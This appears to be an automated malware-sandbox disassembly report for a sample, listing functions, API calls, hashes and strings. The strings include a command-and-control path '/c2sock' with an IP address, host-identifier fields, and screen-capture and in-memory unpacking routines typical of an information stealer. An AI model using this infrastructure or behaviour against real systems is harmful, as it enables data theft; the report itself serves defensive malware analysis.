42f782-42f787 5052->5084 5085 42fb71-42fb78 5052->5085 5053->5058 5065 42fc98 5053->5065 5054->4992 5072 42f951-42f974 5054->5072 5055->4992 5088 42f7f6-42f801 5055->5088 5105 42fbd7-42fbe4 5056->5105 5057->5058 5058->4992 5106 42f83e-42f84b 5059->5106 5060->4992 5095 42fd27-42fd34 5060->5095 5062->5063 5092 42f89a-42f89f 5062->5092 5063->4992 5064->5063 5065->5058 5066->4992 5067->5063 5068->4992 5069->5051 5069->5070 5094 42fcfc 5070->5094 5108 42f920-42f936 5071->5108 5072->5063 5096 42f97a-42f97f 5072->5096 5073->4992 5074->4992 5075->4992 5097 42f692-42f699 5075->5097 5076->5063 5101 42faed-42faf2 5076->5101 5077->4992 5078->4992 5079->4992 5080->4992 5099 42f6dd-42f703 5080->5099 5081->4992 5082->4992 5083->4992 5100 42f74a-42f751 5083->5100 5084->4992 5102 42f78d-42f7ba 5084->5102 5085->4992 5086->5063 5088->5063 5104 42f807-42f80c 5088->5104 5092->5063 5094->5094 5096->5063 5097->4992 5099->5063 5110 42f709-42f70e 5099->5110 5100->4992 5101->5063 5102->5058 5111 42f7c0-42f7c5 5102->5111 5104->5063 5105->4992 5106->4992 5108->4992 5110->5063 5111->5058
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 0042F9A2
                                                          • lstrcatW.KERNEL32(?,?), ref: 0042F9CF
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0042FA7D
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0042FAFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: (lu$)lu$)lu$n_v$n_v$n_v
                                                          • API String ID: 4038537762-1534030094
                                                          • Opcode ID: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                          • Instruction ID: 4b57ba66ae2396d09571da8aec8c9542c80e7c55b9c92ca3ddc1ba6dd1b7a9a6
                                                          • Opcode Fuzzy Hash: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                          • Instruction Fuzzy Hash: 7AF11D71B0012E9BCF289F99E8515BEBAB4FB54310FE44537E401EA3B0D37989469B4B
                                                          Function 0041A28F Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 444COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5808 41a28f-41a2c9 call 447e24 call 44568a 5813 41a2cc-41a2d4 5808->5813 5814 41a341-41a346 5813->5814 5815 41a2d6-41a2db 5813->5815 5816 41a34c-41a351 5814->5816 5817 41a40e-41a413 5814->5817 5818 41a2e1-41a2e6 5815->5818 5819 41a3c5-41a3ca 5815->5819 5824 41a357-41a35c 5816->5824 5825 41a4b8-41a4bd 5816->5825 5826 41a419-41a41e 5817->5826 5827 41a53a-41a53f 5817->5827 5820 41a458-41a45d 5818->5820 5821 41a2ec-41a2f1 5818->5821 5822 41a3d0-41a3d5 5819->5822 5823 41a4f7-41a4fc 5819->5823 5842 41a463-41a468 5820->5842 5843 41a635-41a63a 5820->5843 5828 41a2f7-41a2fc 5821->5828 5829 41a578-41a57d 5821->5829 5832 41a5cb-41a5d0 5822->5832 5833 41a3db-41a3e0 5822->5833 5840 41a502-41a507 5823->5840 5841 41a6c9-41a6ce 5823->5841 5836 41a362-41a367 5824->5836 5837 41a5a5-41a5aa 5824->5837 5834 41a6a1-41a6a6 5825->5834 5835 41a4c3-41a4c8 5825->5835 5838 41a424-41a429 5826->5838 5839 41a5ed-41a5f2 5826->5839 5830 41a705-41a70a 5827->5830 5831 41a545-41a54a 5827->5831 5848 41a302-41a307 5828->5848 5849 41a727-41a735 5828->5849 5868 41a583-41a588 5829->5868 5869 41aa24-41aa2b 5829->5869 5870 41a9c0-41a9cb 5830->5870 5871 41a710-41a715 5830->5871 5862 41a550-41a555 5831->5862 5863 41a886-41a89c call 41941d call 419473 5831->5863 5844 41a936-41a94c 5832->5844 5845 41a5d6-41a5db 5832->5845 5864 41a797-41a7bf 5833->5864 5865 41a3e6-41a3eb 5833->5865 5860 41a992-41a999 5834->5860 5861 41a6ac-41a6b1 5834->5861 5854 41a80e-41a828 call 41c270 call 41f9a4 5835->5854 5855 41a4ce-41a4d3 5835->5855 5856 41a758-41a771 5836->5856 5857 41a36d-41a372 5836->5857 5874 41a5b0-41a5b5 5837->5874 5875 41a902-41a909 5837->5875 5872 41a7db-41a7e2 5838->5872 5873 41a42f-41a434 5838->5873 5850 41a951-41a970 5839->5850 5851 41a5f8-41a5fd 5839->5851 5858 41a50d-41a512 5840->5858 5859 41a85f-41a866 5840->5859 5866 41a6d4-41a6d9 5841->5866 5867 41a99e-41a9a9 call 447e24 5841->5867 5846 41a7e7-41a7ee 5842->5846 5847 41a46e-41a473 5842->5847 5852 41a640-41a645 5843->5852 5853 41a97f-41a98d 5843->5853 5844->5813 5893 41a5e1-41a5e8 5845->5893 5894 41aa30-41aa35 5845->5894 5846->5813 5876 41a7f3-41a809 5847->5876 5877 41a479-41a47e 5847->5877 5895 41a73a-41a748 5848->5895 5896 41a30d-41a312 5848->5896 5849->5813 5879 41a977-41a97a 5850->5879 5892 41a972 5850->5892 5851->5813 5897 41a603-41a625 5851->5897 5852->5813 5901 41a64b call 41d057 5852->5901 5853->5813 5946 41a82d-41a834 5854->5946 5881 41a839-41a85a 5855->5881 5882 41a4d9-41a4de 5855->5882 5856->5813 5902 41a776-41a787 5857->5902 5903 41a378-41a37d 5857->5903 5883 41a518-41a51d 5858->5883 5884 41a86b-41a876 5858->5884 5859->5813 5860->5813 5861->5813 5904 41a6b7-41a6c4 5861->5904 5886 41a8b6-41a8e6 5862->5886 5887 41a55b-41a560 5862->5887 5948 41a8a1-41a8b1 5863->5948 5878 41a7c5-41a7ca 5864->5878 5864->5879 5905 41a3f1-41a3f6 5865->5905 5906 41a7cf-41a7d6 5865->5906 5866->5813 5907 41a6df-41a700 call 41b251 5866->5907 5925 41a9ae-41a9bb 5867->5925 5888 41a8f6-41a8fd 5868->5888 5889 41a58e-41a593 5868->5889 5869->5813 5899 41a9cd-41a9d5 5870->5899 5900 41a9ec-41aa15 5870->5900 5871->5813 5908 41a71b-41a722 5871->5908 5872->5813 5909 41a9d7-41a9da 5873->5909 5910 41a43a-41a43f 5873->5910 5890 41a5bb-41a5c0 5874->5890 5891 41a90e-41a931 call 447e2f 5874->5891 5875->5813 5876->5813 5877->5813 5912 41a484-41a4a8 call 41604a 5877->5912 5878->5879 5879->5813 5881->5813 5882->5813 5914 41a4e4-41a4f2 5882->5914 5883->5813 5915 41a523-41a526 call 447a80 5883->5915 5884->5879 5916 41a87c-41a881 5884->5916 5886->5879 5919 41a8ec-41a8f1 5886->5919 5887->5813 5918 41a566-41a573 5887->5918 5888->5813 5889->5813 5920 41a599-41a5a0 5889->5920 5890->5900 5922 41a5c6 5890->5922 5891->5813 5892->5879 5893->5813 5894->5813 5931 41aa3b-41aa48 5894->5931 5895->5879 5935 41a74e-41a753 5895->5935 5896->5813 5923 41a314-41a331 5896->5923 5897->5879 5924 41a62b-41a630 5897->5924 5899->5869 5899->5909 5928 41aa17 5900->5928 5929 41aa1c-41aa1f 5900->5929 5942 41a650-41a69c call 41aa49 * 3 5901->5942 5902->5879 5911 41a78d-41a792 5902->5911 5903->5813 5930 41a383-41a3b5 call 41592c call 41900a 5903->5930 5904->5813 5905->5813 5932 41a3fc-41a409 5905->5932 5906->5813 5907->5813 5908->5813 5927 41a9db 5909->5927 5910->5813 5934 41a445-41a453 5910->5934 5911->5879 5912->5879 5951 41a4ae-41a4b3 5912->5951 5914->5813 5947 41a52b-41a535 5915->5947 5916->5879 5918->5813 5919->5879 5920->5813 5922->5813 5923->5879 5941 41a337-41a33c 5923->5941 5924->5879 5925->5813 5927->5927 5928->5929 5929->5813 5930->5879 5957 41a3bb-41a3c0 5930->5957 5932->5813 5934->5813 5935->5879 5941->5879 5942->5813 5946->5813 5947->5813 5948->5813 5951->5879 5957->5879
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wctomb_s
                                                          • String ID: /c2sock$94.158.244.69$GhYuIq$file$hwid$lid$pid
                                                          • API String ID: 2865277502-1332857675
                                                          • Opcode ID: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                          • Instruction ID: cc35308ceb474d8d45e9bf1619109491d7752d3a10985d79ac983763bc7ee506
                                                          • Opcode Fuzzy Hash: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                          • Instruction Fuzzy Hash: 11F108B5D0211A9BDF248B88C8455FEBAB1AB14340F24496BE415F7394D33DCAE18B9F
                                                          Function 02ED003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6109 2ed003c-2ed0047 6110 2ed004c-2ed0263 call 2ed0a3f call 2ed0e0f call 2ed0d90 VirtualAlloc 6109->6110 6111 2ed0049 6109->6111 6126 2ed028b-2ed0292 6110->6126 6127 2ed0265-2ed0289 call 2ed0a69 6110->6127 6111->6110 6129 2ed02a1-2ed02b0 6126->6129 6131 2ed02ce-2ed03c2 VirtualProtect call 2ed0cce call 2ed0ce7 6127->6131 6129->6131 6132 2ed02b2-2ed02cc 6129->6132 6138 2ed03d1-2ed03e0 6131->6138 6132->6129 6139 2ed0439-2ed04b8 VirtualFree 6138->6139 6140 2ed03e2-2ed0437 call 2ed0ce7 6138->6140 6142 2ed04be-2ed04cd 6139->6142 6143 2ed05f4-2ed05fe 6139->6143 6140->6138 6145 2ed04d3-2ed04dd 6142->6145 6146 2ed077f-2ed0789 6143->6146 6147 2ed0604-2ed060d 6143->6147 6145->6143 6151 2ed04e3-2ed0505 LoadLibraryA 6145->6151 6149 2ed078b-2ed07a3 6146->6149 6150 2ed07a6-2ed07b0 6146->6150 6147->6146 6152 2ed0613-2ed0637 6147->6152 6149->6150 6153 2ed086e-2ed08be LoadLibraryA 6150->6153 6154 2ed07b6-2ed07cb 6150->6154 6155 2ed0517-2ed0520 6151->6155 6156 2ed0507-2ed0515 6151->6156 6157 2ed063e-2ed0648 6152->6157 6161 2ed08c7-2ed08f9 6153->6161 6158 2ed07d2-2ed07d5 6154->6158 6159 2ed0526-2ed0547 6155->6159 6156->6159 6157->6146 6160 2ed064e-2ed065a 6157->6160 6162 2ed0824-2ed0833 6158->6162 6163 2ed07d7-2ed07e0 6158->6163 6164 2ed054d-2ed0550 6159->6164 6160->6146 6165 2ed0660-2ed066a 6160->6165 6166 2ed08fb-2ed0901 6161->6166 6167 2ed0902-2ed091d 6161->6167 6173 2ed0839-2ed083c 6162->6173 6168 2ed07e4-2ed0822 6163->6168 6169 2ed07e2 6163->6169 6170 2ed0556-2ed056b 6164->6170 6171 2ed05e0-2ed05ef 6164->6171 6172 2ed067a-2ed0689 6165->6172 6166->6167 6168->6158 6169->6162 6177 2ed056d 6170->6177 6178 2ed056f-2ed057a 6170->6178 6171->6145 6174 2ed068f-2ed06b2 6172->6174 6175 2ed0750-2ed077a 6172->6175 6173->6153 6176 2ed083e-2ed0847 6173->6176 6181 2ed06ef-2ed06fc 6174->6181 6182 2ed06b4-2ed06ed 6174->6182 6175->6157 6183 2ed0849 6176->6183 6184 2ed084b-2ed086c 6176->6184 6177->6171 6179 2ed057c-2ed0599 6178->6179 6180 2ed059b-2ed05bb 6178->6180 6192 2ed05bd-2ed05db 6179->6192 6180->6192 6186 2ed06fe-2ed0748 6181->6186 6187 2ed074b 6181->6187 6182->6181 6183->6153 6184->6173 6186->6187 6187->6172 6192->6164
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02ED024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction ID: c888ef0d310670c98a3f762550467d8ce2b93cc8046e61e9807fb0037b26c9d0
                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction Fuzzy Hash: C3526974A41229DFDB64CF68C984BACBBB1BF09314F1480D9E94DAB351DB30AA85CF14
                                                          Function 00432718 Relevance: 10.7, APIs: 7, Instructions: 234COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6334 432718-43272b 6335 43272e-432736 6334->6335 6336 432771-432776 6335->6336 6337 432738-43273d 6335->6337 6338 432821-432826 6336->6338 6339 43277c-432781 6336->6339 6340 432743-432748 6337->6340 6341 4327f0-4327f5 6337->6341 6342 432910-432915 6338->6342 6343 43282c-432831 6338->6343 6344 432787-43278c 6339->6344 6345 4328a9-4328ae 6339->6345 6346 432872-432877 6340->6346 6347 43274e-432753 6340->6347 6348 4327fb-432800 6341->6348 6349 4328e9-4328ee 6341->6349 6356 432ae4-432aeb 6342->6356 6357 43291b-432920 6342->6357 6350 432837-43283c 6343->6350 6351 432a26-432a52 BitBlt 6343->6351 6352 432792-432797 6344->6352 6353 4329d8-4329eb 6344->6353 6364 4328b0-4328b5 6345->6364 6365 4328d6-4328e4 6345->6365 6358 432a76-432a8d CreateCompatibleBitmap 6346->6358 6359 43287d-432882 6346->6359 6360 432979-43298f 6347->6360 6361 432759-43275e 6347->6361 6362 432806-43280b 6348->6362 6363 4329fc-432a09 6348->6363 6354 4328f4-4328f9 6349->6354 6355 432ace-432adf 6349->6355 6366 432842-432847 6350->6366 6367 432a5b-432a71 SelectObject 6350->6367 6368 432ac6-432ac9 6351->6368 6369 432a54-432a59 6351->6369 6376 4329f0-4329f7 6352->6376 6377 43279d-4327a2 6352->6377 6353->6335 6354->6335 6378 4328ff-43290b 6354->6378 6355->6335 6356->6335 6357->6335 6379 432926-432934 6357->6379 6358->6335 6370 432a92-432abf call 4338b5 call 43350d 6359->6370 6371 432888-43288d 6359->6371 6360->6335 6372 432994-4329d3 call 430e6c * 2 6361->6372 6373 432764-432769 6361->6373 6380 432811-432816 6362->6380 6381 432a0e-432a21 SelectObject 6362->6381 6363->6335 6374 432af0-432af5 6364->6374 6375 4328bb-4328c6 6364->6375 6365->6335 6366->6335 6385 43284d-432863 call 432b1b 6366->6385 6367->6335 6368->6335 6369->6368 6370->6368 6409 432ac1 6370->6409 6371->6335 6387 432893-4328a4 CreateCompatibleDC 6371->6387 6372->6335 6388 432943-432946 6373->6388 6389 43276f 6373->6389 6374->6335 6391 432afb-432b1a DeleteDC DeleteObject 6374->6391 6375->6388 6390 4328c8-4328d0 6375->6390 6376->6335 6377->6335 6392 4327a4-4327e0 call 4338b5 call 432718 6377->6392 6378->6335 6393 432936 6379->6393 6394 43293b-43293e 6379->6394 6383 43295b-432974 6380->6383 6384 43281c 6380->6384 6381->6335 6383->6335 6384->6335 6405 432865 6385->6405 6406 43286a-43286d 6385->6406 6387->6335 6399 432947 6388->6399 6389->6335 6390->6365 6390->6383 6392->6368 6411 4327e6-4327eb 6392->6411 6393->6394 6394->6368 6399->6399 6405->6406 6406->6368 6409->6368 6411->6368
                                                          APIs
                                                          • CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                          • DeleteDC.GDI32(00000002), ref: 00432B01
                                                          • DeleteObject.GDI32(?), ref: 00432B0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$CompatibleCreateObject
                                                          • String ID:
                                                          • API String ID: 1022343127-0
                                                          • Opcode ID: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                          • Instruction ID: 50fedbdf880eafc0b33480be7e0390951b775b57d16ab65b209ae7f2f2027e24
                                                          • Opcode Fuzzy Hash: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                          • Instruction Fuzzy Hash: 358116B590031A9BDF209F948EC557E7A74BB0C350F282617E510F63A0D3FD9A419BAB
                                                          Function 0044CF15 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6412 44cf15-44cf21 6413 44cfb3-44cfb6 6412->6413 6414 44cf26-44cf37 6413->6414 6415 44cfbc 6413->6415 6417 44cf44-44cf5d LoadLibraryExW 6414->6417 6418 44cf39-44cf3c 6414->6418 6416 44cfbe-44cfc2 6415->6416 6421 44cfc3-44cfd3 6417->6421 6422 44cf5f-44cf68 GetLastError 6417->6422 6419 44cf42 6418->6419 6420 44cfdc-44cfde 6418->6420 6424 44cfb0 6419->6424 6420->6416 6421->6420 6423 44cfd5-44cfd6 FreeLibrary 6421->6423 6425 44cfa1-44cfae 6422->6425 6426 44cf6a-44cf7c call 4516ce 6422->6426 6423->6420 6424->6413 6425->6424 6426->6425 6429 44cf7e-44cf90 call 4516ce 6426->6429 6429->6425 6432 44cf92-44cf9f LoadLibraryExW 6429->6432 6432->6421 6432->6425
                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000,?,0044D022,?,00426F52,00000000,00000000,?,?,0044CDD6,00000021,FlsSetValue,0046503C,FlsSetValue,00000000), ref: 0044CFD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3664257935-537541572
                                                          • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                          • Instruction ID: c6a9518bbc4403065455c8dc6532f837efe444071a0c6fa5154c8577c36c6d79
                                                          • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                          • Instruction Fuzzy Hash: 4521EE31E47210ABEB219B65DCC0A5B77699B41764B190122FD05A73D0FBBCDD08C6DD
                                                          Function 0044575F Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6676 44575f-445778 6678 44578d-44579d 6676->6678 6679 44577a-44578b call 4447a4 call 44e2f7 6676->6679 6681 4457b2-4457b8 6678->6681 6682 44579f-4457b0 call 4447a4 call 44e2f7 6678->6682 6701 4457e0-4457e2 6679->6701 6683 4457c0-4457c6 6681->6683 6684 4457ba 6681->6684 6703 4457df 6682->6703 6690 4457e3 call 453aae 6683->6690 6691 4457c8 6683->6691 6688 4457d2-4457dc call 4447a4 6684->6688 6689 4457bc-4457be 6684->6689 6704 4457de 6688->6704 6689->6683 6689->6688 6698 4457e8-4457fd call 453711 6690->6698 6691->6688 6695 4457ca-4457d0 6691->6695 6695->6688 6695->6690 6706 445803-44580f call 45373d 6698->6706 6707 4459ee-4459f8 call 44e307 6698->6707 6703->6701 6704->6703 6706->6707 6712 445815-445821 call 453769 6706->6712 6712->6707 6715 445827-44583c 6712->6715 6716 4458ac-4458b7 call 4537d0 6715->6716 6717 44583e 6715->6717 6716->6704 6723 4458bd-4458c8 6716->6723 6719 445840-445846 6717->6719 6720 445848-445864 call 4537d0 6717->6720 6719->6716 6719->6720 6720->6704 6725 44586a-44586d 6720->6725 6726 4458e4 6723->6726 6727 4458ca-4458d3 call 453a5a 6723->6727 6728 4459e7-4459e9 6725->6728 6729 445873-44587c call 453a5a 6725->6729 6730 4458e7-4458fb call 4543d0 6726->6730 6727->6726 6737 4458d5-4458e2 6727->6737 6728->6704 6729->6728 6738 445882-44589a call 4537d0 6729->6738 6739 4458fd-445905 6730->6739 6740 445908-44592f call 4527e0 call 4543d0 6730->6740 6737->6730 6738->6704 6745 4458a0-4458a7 6738->6745 6739->6740 6748 445931-44593a 6740->6748 6749 44593d-445964 call 4527e0 call 4543d0 6740->6749 6745->6728 6748->6749 6754 445966-44596f 6749->6754 6755 445972-445981 call 4527e0 6749->6755 6754->6755 6758 445983 6755->6758 6759 4459a9-4459c7 6755->6759 6760 445985-445987 6758->6760 6761 445989-44599d 6758->6761 6762 4459e4 6759->6762 6763 4459c9-4459e2 6759->6763 6760->6761 6764 44599f-4459a1 6760->6764 6761->6728 6762->6728 6763->6728 6764->6728 6765 4459a3 6764->6765 6765->6759 6766 4459a5-4459a7 6765->6766 6766->6728 6766->6759
                                                          APIs
                                                          • __allrem.LIBCMT ref: 004458F2
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044590E
                                                          • __allrem.LIBCMT ref: 00445925
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445943
                                                          • __allrem.LIBCMT ref: 0044595A
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445978
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                          • Instruction ID: 558deed22b9213933cb6ee14014e535275a7d7dbd354c33e6b5693a62e892da8
                                                          • Opcode Fuzzy Hash: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                          • Instruction Fuzzy Hash: 0681D8B1600B06DBFB20AE29CC42B5BB3E9AF54768F24452FE411D67C3E778D9058B58
                                                          Function 00433C10 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 252COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 9a%^$M%$Screen.png
                                                          • API String ID: 0-2021954137
                                                          • Opcode ID: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                          • Instruction ID: 11fefa64aaa65e2afc3480572e0d96af9cd0f56f536a59b59af3bc8bd9e58722
                                                          • Opcode Fuzzy Hash: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                          • Instruction Fuzzy Hash: 4691D8B6E005098ADF248E98888557EB6B4AB9C312F647917E416FB390E37CCF41875B
                                                          Function 00402FCC Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 283libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402FE0
                                                          • LoadLibraryA.KERNELBASE(my-global-render.dll), ref: 00402FEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: advapi32.dll$my-global-render.dll
                                                          • API String ID: 1029625771-772900288
                                                          • Opcode ID: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                          • Instruction ID: f2405b5e0aceb9a51e137d87bf907524102569514c3531be8be57496d61f3bc2
                                                          • Opcode Fuzzy Hash: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                          • Instruction Fuzzy Hash: 6BA1F872D0412A86CF64CE98994527E6E78BB10351F250A3BE915FA3D0C7BCCF41A79B
                                                          Function 004338B5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^^4$^^4$~rjz
                                                          • API String ID: 0-2511145224
                                                          • Opcode ID: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                          • Instruction ID: fe384b451c266d20576388885646b2b98754c57df49fd09348afa64f247ec54d
                                                          • Opcode Fuzzy Hash: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                          • Instruction Fuzzy Hash: 9E618C72E0011947EF287D4888855BEB7919B88B1AF342927F115FB391C76C8F4D974B
                                                          Function 00453B82 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                            • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharInformationMultiTimeWideZone
                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                          • API String ID: 1123094072-239921721
                                                          • Opcode ID: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                          • Instruction ID: af1a61733d26d89116c9bb65ccd9636383a7b5e966e3c510a6c9de8ec0de26fa
                                                          • Opcode Fuzzy Hash: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                          • Instruction Fuzzy Hash: FC4199B2D00115BBDB106FA6DC46A5ABF78EF04396F10406BFD04A7162E7789F148B99
                                                          Function 004439BA Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0044387B,?,00443A9B,00000000,?,?,0044387B,381389CC,?,0044387B), ref: 004439CB
                                                          • TerminateProcess.KERNEL32(00000000,?,00443A9B,00000000,?,?,0044387B,381389CC,?,0044387B), ref: 004439D2
                                                          • ExitProcess.KERNEL32 ref: 004439E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                          • Instruction ID: af00403c123718aebf8df8255158ed5eb80799a0d3dec5c869f97e29736db2e2
                                                          • Opcode Fuzzy Hash: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                          • Instruction Fuzzy Hash: 7ED09E71404115BBEF113F61DC0E9593F2AAF40787B144029F90596132DFF59E51DB99
                                                          Function 0041D057 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentHwProfileA.ADVAPI32(00000000,?,?,0041A650), ref: 0041D07D
